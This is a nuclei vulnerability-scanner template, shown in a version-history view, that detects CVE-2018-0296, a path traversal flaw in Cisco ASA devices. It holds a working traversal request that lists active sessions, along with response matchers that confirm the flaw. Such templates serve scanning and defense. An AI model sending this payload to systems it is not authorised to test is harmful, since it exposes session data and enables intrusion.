nuclei-templates/cves/2018/CVE-2018-0296.yaml

23 lines
492 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-0296
2020-04-22 06:42:01 +00:00
info:
name: Cisco ASA path traversal vulnerability
author: organiccrap
severity: medium
2021-03-18 07:54:36 +00:00
tags: cve,cve2018,cisco,lfi
reference: https://github.com/yassineaboukir/CVE-2018-0296
2020-04-22 06:42:01 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
matchers-condition: and
2020-04-22 06:42:01 +00:00
matchers:
- type: word
words:
2020-05-25 07:49:06 +00:00
- "///sessions"
2020-04-22 06:42:01 +00:00
part: body
- type: status
status:
- 200